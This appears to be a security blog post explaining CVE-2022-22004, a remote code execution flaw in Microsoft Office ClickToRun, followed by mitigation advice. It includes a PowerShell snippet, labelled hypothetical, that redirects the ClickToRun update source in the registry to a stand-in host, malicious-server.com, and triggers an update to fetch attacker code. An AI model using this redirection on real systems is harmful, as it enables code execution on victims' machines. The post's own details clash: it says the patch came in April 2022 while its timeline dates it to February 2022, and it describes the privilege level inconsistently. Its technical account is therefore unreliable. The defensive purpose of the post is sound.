In April 2022, Microsoft patched a critical vulnerability tracked as CVE-2022-22004. This bug affected Microsoft Office’s ClickToRun deployment technology, and allows attackers to execute remote code on a victim's computer. Although it hasn't gotten as much press as some zero-days, CVE-2022-22004 is a real risk, especially for organizations where ClickToRun is enabled.
In this post, we’ll make sense of the details, see what’s at risk, look at how attackers can exploit it, and give you guidance to stay safe.
What is ClickToRun?
ClickToRun (C2R) is a service Microsoft uses to deliver and update Office apps quickly over the internet. Instead of copying over all files at once, it streams components as they’re needed.
Because C2R runs with system-level privileges and frequently fetches data from the internet, it can be a juicy target for attackers.
The Root Cause
The vulnerability is a remote code execution (RCE) bug in the way ClickToRun processes certain updates. Specifically, it fails to properly validate trusted sources, which can allow attackers to inject arbitrary code.
According to Microsoft’s own advisory
> *An attacker who successfully exploited this vulnerability could execute arbitrary code as the user running the affected application.*
If an attacker lures a user into downloading a malicious update or accessing a compromised server, it could trigger C2R to process and run attacker-supplied code.
Let’s break down a possible exploit scenario
1. Preparation: The attacker creates a malicious Office update package or C2R manifest that includes harmful code.
2. Delivery: The attacker convinces the target to configure their Office installation to use the attacker's server (for example, via phishing, a fake support email, or social engineering).
3. Execution: When C2R fetches the updates from the malicious server, it executes the code in the context of the running user (potentially SYSTEM, if using elevated privileges).
Sample Exploit Snippet
Here’s a hypothetical example (for educational purposes only) that demonstrates how an attacker might point an Office instance to a malicious click-to-run server using PowerShell:
# WARNING: DO NOT RUN THIS CODE!
# Imagine this as part of an attacker's script.
# Set the ClickToRun update source to attacker's server
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Office\ClickToRun\Configuration" -Name "CDNBaseUrl" -Value "http://malicious-server.com/officecdn";
# Trigger an update check
Start-Process "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe" -ArgumentList "/update user"
If the vulnerability exists, and Office doesn't properly validate the source, it might download and execute malicious code delivered from malicious-server.com.
How Dangerous Is This?
- Privilege: Code runs as the user — if that user is an admin, the entire system can be compromised.
How To Protect Yourself
1. Patch Immediately:
Microsoft fixed this in April 2022 Patch Tuesday. Update Office and Windows to the latest versions.
2. Block Malicious Traffic:
Monitor and filter outbound traffic, especially to unknown update domains.
3. Least Privilege:
Run everyday tasks with a non-admin account. Restrict who can change Office update settings.
4. User Training:
Educate users about phishing and suspicious URLs.
5. Audit:
Check your systems for custom or suspicious Office update sources.
References and Further Reading
- Microsoft Security Advisory CVE-2022-22004
- Click-to-Run for Office Overview
- April 2022 Patch Tuesday Overview (BleepingComputer)
Conclusion
CVE-2022-22004 is a perfect reminder that even the tools we trust for regular software updates can be abused. Keeping your systems updated and following good security practices is more important than ever. Don’t wait—patch your Office systems, watch for suspicious update sources, and be vigilant!
Have thoughts or questions? Leave a comment below. Stay safe!
Timeline
Published on: 02/09/2022 17:15:00 UTC
Last modified on: 02/14/2022 21:23:00 UTC